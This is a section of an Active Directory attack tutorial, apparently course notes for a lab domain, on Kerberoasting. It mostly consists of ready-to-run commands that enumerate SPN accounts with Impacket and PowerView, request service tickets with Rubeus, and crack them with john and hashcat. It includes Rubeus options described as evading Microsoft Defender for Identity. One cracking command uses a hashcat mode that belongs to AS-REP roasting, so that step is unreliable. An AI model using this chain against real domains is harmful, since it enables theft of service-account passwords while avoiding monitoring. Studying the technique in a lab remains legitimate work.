7.4 - Kerberoasting

Kerberoasting

Kerberoasting targets service accounts with an assigned SPN. When a user requests access to a service, they receive a Service Ticket (ST) encrypted with the service account’s long-term password.

If an attacker can obtain the ST, they can attempt to crack the encryption offline to retrieve the service account password.

Kerberos Ticket Exchange for Services

3) TGS-REQ (Client -> KDC/TGS)
   - TGT 🔑 Encrypted with KDC key
   - Authenticator Data 🔑 Encrypted with TGS Session Key

4) TGS-REP (KDC/TGS -> Client)
   - ST 🔑 Encrypted with Service key
   - Service Session Key 🔑 Encrypted with TGS Session Key

Unlike AS-REP Roasting, Kerberoasting requires valid domain user credentials to request a service ticket.

Example: Exploiting Kerberoasting

Step 1: Create a User with an SPN

New-ADUser -Name "kerberoasting" -SamAccountName "kerberoasting" -UserPrincipalName "kerberoasting@dev-angelist" -AccountPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force) -Enabled $true

Step 2: Assign an SPN

Set-ADUser -Identity "kerberoasting" -ServicePrincipalNames @{Add="HTTP/kerberoasting.dev-angelist.lab"}

Step 3: Verify the SPN

Get-ADUser -Identity "kerberoasting" -Properties ServicePrincipalNames
setspn -L kerberoasting

Step 4: Identify Kerberoastable Accounts

#On attacker machine create a dedicated python environment (optional)
python3 -m venv venv
. venv/bin/activate
pip3 install impacket
#Check kerberoastable users using the Impacket's module: GetUserSPNs.py
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc
#Or using AD Module and PowerView (Windows)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Get-DomainUser -SPN

in this case there're two vulnerable users: 'kerberoasting' and 'angel'.

Step 5: Request Service Tickets for Kerberoasting

GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request #without specifing a user it checks all possible tickets
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request-user kerberoasting | grep '\$krb5tgs\$' > kerberoast.txt

or using Rubeus:

#View statistics on Kerberoastable accounts:
Rubeus.exe kerberoast /stats
#Request a TGS for a specific user:
Rubeus.exe kerberoast /user:svcadmin /simple
#To avoid detection (e.g., MDI logging downgrade attacks), target accounts restricted to RC4:
Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec
#Kerberoast all RC4-only accounts and output to file:
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt

Step 6: Crack the Service Ticket

john --wordlist=/home/kali/Documents/password.txt ./kerberoast.txt
hashcat -m 18200 ./kerberoast.txt /home/kali/Documents/password.txt
#john.exe --wordlist=C:\AD\Tools\kerberoast\10kworst-pass.txt C:\AD\Tools\hashes.txt

Troubleshooting: Clock Skew Errors

If you encounter KRB_AP_ERR_SKEW (Clock skew too great), synchronize the clocks with:

sudo timedatectl set-ntp off
ntpdate -q corp-dc
ntpdate -u corp-dc

Other Resources

Labs

Last updated